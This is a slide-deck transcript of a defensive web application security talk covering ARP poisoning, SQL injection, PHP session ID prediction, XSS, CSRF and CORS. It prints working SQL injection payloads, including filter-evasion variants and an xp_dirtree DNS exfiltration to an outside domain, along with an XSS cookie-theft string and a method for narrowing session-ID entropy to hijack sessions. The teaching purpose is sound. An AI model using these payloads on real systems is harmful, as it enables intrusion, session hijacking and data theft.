Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Web Application Security

Web Application Security

Web application security is a central component of any web-based business. The global nature of the Internet exposes web properties to attack from different locations and various levels of scale and complexity. Web application security deals specifically with the security surrounding websites, web applications, and web services such as APIs.

What are common web app security vulnerabilities?
Attacks against web apps range from targeted database manipulation to large-scale network disruption. Let’s explore some of the common methods of attack or “vectors” commonly exploited.

Cross-site scripting (XSS)
SQL injection (SQi)
Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks -
Cross-site request forgery (CSRF)
Data breach

Krishantha Dinesh

January 01, 2021
Tweet

More Decks by Krishantha Dinesh

Other Decks in Technology

Transcript

  1. Lets Abuse protect Web [Code best practices to stay safe]

    Krishantha Dinesh Msc, MIEEE, MBCS Software Architect www.krishantha.com www.youtube.com/krish @krishantha
  2. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Audience have basic

    knowledge about Network / software developments / sql • Examples if any.. Those are just for learning purposes • Will not be teach any programming language • Audience have Good understanding about legal part of computer/cyber crimes 2 Assumptions
  3. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Mutual agreement • Since

    objective of this session is to teach how to protect web application / system from attackers and protect self privacy.. any unintended usage of this learning will be completely responsible of the user. • Presenter will not be responsible for any damage , loss or legal issues can cause by misusing this learnings. • It is assumed that entire audience including who comes to the session after this slide are aware about the limitation and legal side of usage this learnings. 3
  4. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Hacking???? What is that?

    • Hacking is the practice of modifying the features of a system, in order to accomplish a goal outside of the creator's original purpose. The person who is consistently engaging in hacking activities, and has accepted hacking as a lifestyle and philosophy of their choice, is called a hacker. 8
  5. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is MITM attack?

    • One of the most prevalent network attacks used against individuals and large organizations • MITM works by establishing connections to victim machines and relaying messages between them • one victim believes it is communicating directly with another victim, when in reality the communication flows through the host performing the attack ( same as real world J ) • attacking host can not only intercept sensitive data, but can also inject and manipulate a data stream to gain further control of its victims 14
  6. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How can performed MITM

    attack? • There are many forms of MITM Attack • ARP Poisoning • DNS Spoofing • HTTP session Hijacking • Port stealing • ICMP redirection • SSL Hijacking 15
  7. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is ARP? •

    The ARP protocol was designed out of necessity to facilitate the translation of addresses between the second and third layers of the OSI model. • Each layer has its own addressing scheme, and they must work together in order to make network communication happen • For above requirement ARP was created with RFC 826, “An Ethernet Address Resolution Protocol”. 16
  8. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How ARP works in

    real.… • ARP operation is centered around two packets, an ARP request and an ARP reply • Purpose of the request and reply are to locate the hardware MAC address associated with a given IP address • When 10.0.81.85 needs to contact 10.0.81.82 it send broadcast message as “who has 10.0.81.82 tell 10.0.81.85” • 10.0.81.82 will respond as “10.0.81.82 is at 1C-3E-84-8D-9C-53” 25
  9. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How this compromised? •

    ARP cache poisoning takes advantage of the insecure nature of the ARP protocol • devices using ARP will accept updates at any time • This means that any device can send an ARP reply packet to another host and force that host to update its ARP cache with the new value • Sending an ARP reply when no request has been generated is called sending a gratuitous ARP • When malicious intent is present the result of a few well placed gratuitous ARP packets used in this manner can result in hosts who think they are communicating with one host, but in reality are communicating with a listening attacker 28
  10. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How to defend 30

    • arp –a will give you arp cache. Check for duplication entry • #avoid - Use static arp when possible arp –s <IP> <MAC> • #detect - IDS
  11. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How DNS works lets

    talk about web - www.krishantha.com DNS Server DNS Server Krishantha.com I need to visit http://krishantha.com domain http://krishantha.com is not in my cache. Let me check other DNS Yep.. I have it. http://krishantha.com mapped to 69.65.3.251
  12. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is SQL Injection

    ??? • SQL Injection is one of the many web attack mechanisms used by hackers to steal data from organizations. It is perhaps one of the most common application layer attack techniques used today. It is the type of attack that takes advantage of improper coding of your web applications that allows hacker to inject SQL commands into say a login form to allow them to gain access to the data held within your database. • In essence, SQL Injection arises because the fields available for user input allow SQL statements to pass through and query the database directly. 34
  13. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How its worked •

    Lets think we have a app and in logging screen we check that use exist or not using following query. • SELECT * FROM tblUsers WHERE Name = $name AND Password = $password; • Means if user entered correct use name and password it will return data. Then we know user name and password are correct. Login allowed. • SELECT * FROM tblUsers WHERE Name = ‘Krish’ AND Password = ‘mypass’; 35
  14. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Make database confuse… •

    We just need to think how to manipulate condition part of query • Go back to basics.. How is AND / OR operator works ?? • Use that • Enter “1 or 1=1 ;--” as login name .. The it will looks like • SELECT * FROM tblUsers WHERE Name = 1 or 1=1;-- AND Password = $password; • Since 1=1 true and rest ignored my commenting.. database will return everything 36
  15. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Its more dangerous… •

    If someone send like this?? • SELECT * FROM tblUsers WHERE Name = ‘’; drop table tblUsers; -- AND Password = $password; • There are two queries. • First one will do nothing… • Second one will drop the table… 37
  16. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How can defend from

    this? • Usual answer is use prepared statement. • "SELECT * FROM `users` WHERE `username` = '?'“ which tell database about template. Now database knows only one value allowed 38
  17. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Are we safe now?

    • Answer is NO.. But why??? • There are several ways to still track you. • There are 3 types of categorized which you get attacked • In-band • Out-of-band • Inferential 39
  18. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ In-band • Data extract

    using same medium which used to inject the sql code • This is most common attack type. We can go with error base or union base • http://example.com/login.asp?id=1 or 1=convert(int,(USER))— • System will say • Syntax error converting nvarchar value ‘[sa]’ to a columns of data type int • Oh… database just told us what is the user name which application is used J 40
  19. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-band • In this

    case response for the attack is comes in different way. • In previous response come right there in the screen. But this type response is come in different media.. May be email or sms or DNS or another. declare @k varchar(1024); set @k='master..xp_dirtree ''\\'+user_name()+'krishantha.com\x'''; exec(@k) 41
  20. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ inferential • This is

    difficult one to do. If application returns the errors then it is easy to track. • But if application hides it error? Then you need to build logics to get some response from server • http://example.com/login.asp?id=1;if(select+system_user)+=+'sa'+waitfor+delay+'0:0 :15'-- • Means you ask question and check the behavior 42
  21. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ your app is exposed?

    Penetration test • There are several scenarios we can use to extract data from system using sql injection. So in order to make sure your application is secured.. You need to test these scenarios with your application • Error base • String base • Integer base • Union base • Blind attack 43
  22. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Error base Testing •

    http://example.com/login.asp?id=1 or 1=convert(int,(USER))— • Syntax error converting nvarchar value ‘[sa]’ to a columns of data type int • Like this you can get • USER • DB_NAME • @@servername • @@version 44
  23. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Union based Test •

    http://example.com/login.asp?id=1 UNION ALL select 1-- • All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists • http://example.com/login.asp?id=1 UNION ALL select 1,2— • All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists • http://example.com/login.asp?id=1 UNION ALL select 1,2,3— • NO ERROR means ????? 45
  24. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Blind attack test •

    http://example.com/login.asp?id=1; if(len(USER)=1) WAITFOR DELAY ‘00:00:15’-- • If page comes immediately now you know username is not an one character. So increase number and find number of characters. The find start with and so on…. 46
  25. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Filters are good for

    defend? • Client side filtering • Its too bad. Anyone can save page and modify script and re-send • Attacker has full control for his browser. So no point of putting your security mechanism in browser • So is it a good idea for prevention? 47
  26. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Control filtering • As

    we know we need to pass something like ‘id=2 or 1=1’ in order to make ‘true’ in sql query condition part. • So how we can avoid attack using control based validation • Make field only allowed for alpha numeric ??? • So I will send ‘id=2 or 1 like 1’ J • Is it successful ????? 48
  27. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Signature base filtering •

    flow: to_server,established:content:" ' or 1=1 --“ • Then we use ‘id=2 or 1<2’ J • Best is filter not allowed digit after logical operand so it will not allowed 1=1 or 1<2 or 1 like 1 • Are we safe??? • How about ‘id=2 or 2=1+1’ • oOOOOOpppssss….. 49
  28. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What do we do???

    • How about if we block any math/logics in conditional part??? • It will catch 2=1+1 • Now we safe?? • If I use this ??? ‘id=2/**/or/**/2/**/=/**/2—’ L 50
  29. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Solution is block regex

    • flow:to_srver,established; pcre:"/(and|or)1=1(\-\-|\/\*|\#)/|“ • Thanks god now I am safe… • But………. • id=2 or 6+1+2=8+1%2D%2D • L L L L L L L L L L L L 51
  30. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is this •

    Steal some once idea • Application uses many techniques to maintain session • We are going to analyze a cookie and generate something duplicate 53
  31. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Sample model • Social

    network site • Developed using php and running with php sessions • Has facility to chat • Can upload images,status,notes and etc 54
  32. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ If we considered php

    • Very common language for build website • PHP Session – common default session management • Its used by default most framework such as CakePHP, kohana, cakephp • Session pass via URL or … 55
  33. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What is http cookie

    ? • is a small piece of data sent from a website and stored in a user's web browser while the user is browsing that website. Every time the user loads the website, the browser sends the cookie back to the server to notify the website of the user's previous activity.[1] Cookies were designed to be a reliable mechanism for websites to remember stateful information (such as items in a shopping cart) or to record the user's browsing activity • (WIKI) 57
  34. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Anatomy of PHP session

    • Session_start() • http://gcov.php.net/PHP_5_3/lcov_html/ext/session/session.c.gcov.php • spprintf(&buf, 0, "%.15s%ld%ld%0.8F", remote_addr ? remote_addr : "", // IP address 32 bits tv.tv_sec, //epoch 32 bits (long int)tv.tv_usec, //micro sec 32 bits php_combined_lcg(TSRMLS_C) * 10); // random long 64 bits • 160 bit total !!!! 58
  35. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ 160 bit to tryout

    in normal path • 160 bit = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000,000,000 1 million Tx per second = 1,461,501,637,330,900,000,000,000,000,000,000,000,000,000 1 trillion Tx per second = 46,343,912,903,694,300,000,000,000,000 YERS to finish the attack forty-six octillion, three hundred forty-three septillion, nine hundred twelve sextillion, nine hundred three quintillion, six hundred ninety-four quadrillion, three hundred trillion YEARS.. LoL 59
  36. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out- of box thinking

    • Micro seconds are not really 32 bit. 1000 x 1000 micro seconds for second. So its 20 bit. (999,999) now total come down 148 bit • EPOCH.. How can avoid this…. • Facebook chat ??? Its says when u online.. How?? • Ajax calls… • Use http monitor like wireshark u can see back and forth traffic • It will tell SERVER TIME J so we discover the epoch which is 32 bit. • Now 116 bit J 60
  37. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • When user

    is online send message with you web site • When user click that read apache log • Hurray….. Now we have • What ????? • IP ADDRESS other 32 bit • Now we need 84 bits 61
  38. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Ou-of-box • Random LCG

    • LGC means Linear congruential generator • A linear congruential generator (LCG) is an algorithm that yields a sequence of pseudo-randomized numbers calculated with a linear equation. The method represents one of the oldest and best-known pseudorandom number generator algorithms.[1] The theory behind them is easy to understand, and they are easily implemented and fast, especially on computer hardware which can provide modulo arithmetic by storage-bit truncation. 62
  39. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • According to

    that it use dates • Yes we do not know that to micro second. But we know • Year , month , week , date J • So we reduce other 12 bits • S2 refer process id allocated 32 which is 15 long so can save other 17 bit • If u can execute php function you can save entire 32 bit J • So we save other 44 bits now we have only 40 bits 64
  40. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Out-of-box • Now 40

    bits mean we can attack within 12 hour J • If we use two processes to calculation it goes down to 30 minutes J 65
  41. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How to prevent •

    Create own keys on sessions • Do not use process id or system variables on keys • When use date use some algorithms to convert in to some other date 66
  42. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why this happens •

    <script> are hidden but executable • Usually HTML does not render tags. • If we have <script> inside HTML those will not show to user • So if someone add <script> to the site then visitor will not know that they are exposing something where they did not mean to.
  43. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ JS (Java script) &

    History • Released in 1995 from Netscape • 1999 David Ross published paper “script injection” [inspired by Georgi Guninski] • 2005 Samy Kamkar attacked myspace • JS is a client-side processed scripting language So it can use to attack the user (client) • General aim of the attack is Session Hijacking or Credentials Stealing o ex. Steal user cookie & use web app as them • Can compromise the entire application through users
  44. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ What it can do

    • stealing other user’s cookies / sessions • stealing others private information • performing actions on behalf of others • redirecting to other websites • Display alerts and messages •
  45. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How its works •

    Website allows users to send (POST) data to the website • Hackers use this to post their scripts • If website not validate those inputs website will execute those on other users • When script get execute hacker get the data they want
  46. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Non persistence • When

    XSS code only gets displayed in the next page to the same user and not gets saved into persistent storage like database. These are less vulnerable, because this only expose current data again its hackers.
  47. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ CSRF Cross-site request forgery

    this use trusted authenticated user to execute unwanted code. As example lets think Bob log in to bank account and jack sent mail with a link and that link is the POST request which bank used to transfer money. When bop clicks on that link it use same session token which issued by the bank and it transfers money !!!!!
  48. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Persistent XSS • In

    persistent type of XSS attack, XSS code gets saved into persistent storage like database with other data and then it is visible to other users also. One example of this kind of attacks is possible when user can submit comment so, where hacker can add their XSS code along with the comment text and if no validation or filtering is present on the server, XSS code can successfully saved into the database. • After this if anyone (other users) open the page into their browsers, XSS code can execute and can perform a variety of harmful actions. This type of attack is more vulnerable, because Hacker can steal cookies and can make modifications in the page. The risk with these kinds of attacks is any third party hacker can use this vulnerability to perform some actions on behalf of other users.
  49. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ DOM based attacks DOM

    Based XSS (or type-0 XSS) is an XSS attack wherein the attack payload is executed as a result of modifying the DOM in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner.
  50. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ DOM based attack example

    • Expected URL in HTTP request, parameter decides default language to display o http://www.some.site/page.html?default=French • Malicious URL o http://www.some.site/page.html?default=<script>alert(document.cookie)</script>
  51. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Don’t to depends

    on client side JS validations • Do server side validations By sanitizing the input data, we can prevent the malicious code to enter in the system. Blacklists – Block <script> and other attributes such as onload, onclick, onmouseover etc.
  52. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Recursive sanitization o

    When processing a client HTTP request or user supplied data it must be sanitized o Why recursive? § Wrapping commonly sanitized characters or sub-strings § ex. <scr<script>ipt> . . . </scr</script>ipt> becomes… § <script> . . . </script> • Properly handle Encoding/Decoding o URL Encoding / Percent Encoding § One method attackers used to bypass literal character filtering is to encode known untrusted/dangerous characters (ex. %3C = ‘<’) o HTML Encoding / Decoding § Another method for bypassing these filters is to HTML encode those characters injected into the document to be decoded back into scripts when the page is rendered
  53. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Follow the escape rules

    5 Rules for escaping output #1 - HTML Escape before inserting into element content #2 - Attribute Escape before inserting into attributes #3 - JavaScript Escape before inserting into JavaScript data values #4 - CSS Escape before inserting into style property values #5 - URL Escape before inserting into URL attributes
  54. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ • Cross-Origin Resource Sharing

    (CORS) [rfc6454 – web origin concept] is a mechanism that uses additional HTTP headers to tell browsers to give a web application running at one origin, access to selected resources from a different origin. A web application executes a cross-origin HTTP request when it requests a resource that has a different origin (domain, protocol, or port) from its own. • For security reasons, browsers restrict cross-origin HTTP requests initiated from scripts.
  55. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Web document Domain: codelabs.lk

    Webserver Codelabs.lk Webserver Cosmos.codelabs.lk GET image1.png GET image2.png This handled by CORS
  56. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why we need to

    think about CORS • The web pages we visit make frequent requests to load assets like images, fonts, and more, from many different places across the Internet. If these requests for assets go unchecked, the security of the browser may be at risk. For example, our browser may be subject to hijacking, or our browser might blindly download malicious code. As a result, many modern browsers follow security policies to mitigate such risks.
  57. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Same origin policy •

    The same-origin policy is very restrictive. Under this policy, a web page hosted on server X can only interact with other documents that are also on server X. In short, the same-origin policy enforces that documents that interact with each other have the same origin. • An origin is made up of the : the protocol, host, and port number. • From http://codelabs.lk/index.html • http://codelabs.lk/products.html is ALLOWED by same origin policy as origin is same (http+codelabs.lk+80) • http://cosmos.codelabs.lk/features.html is NOT ALLOWED as hostname is different.
  58. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Why CORS is necessary

    ? • Mainly because no policy is very vulnerable and same origin policy is too restrictive. • It allows servers to specify not just who can access its assets, but also how the assets can be accessed. • Cross-origin requests are made using the standard HTTP request methods. Most servers will allow GET requests, meaning they will allow resources from external origins (say, a web page) to read their assets. HTTP requests methods like PATCH, PUT, or DELETE, however, may be denied to prevent malicious behavior. For many servers, this is intentional. For example, it is likely that server A does not want servers B, C, or D to edit or delete its assets. • With CORS, a server can specify who can access its assets and which HTTP request methods are allowed from external resources.
  59. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ How it impose the

    security • It allows servers to specify not just who can access its assets, but also how the assets can be accessed. • As example codelabs.lk server can configure cosmos.codelabs.lk origin to GET resources from codelabs.lk but not allowed to POST,PUT,DELETE
  60. * http://www.krishantha.com * https://www.youtube.com/krish * https://www.linkedin.com/in/krish-din/ Cross origin policy •

    Unlike “simple origin policy” "pre-flighted" requests first send an HTTP request by the OPTIONS method to the resource on the other domain, to determine if the actual request is safe to send. Cross-site requests are pre-flighted like this since they may have implications to user data.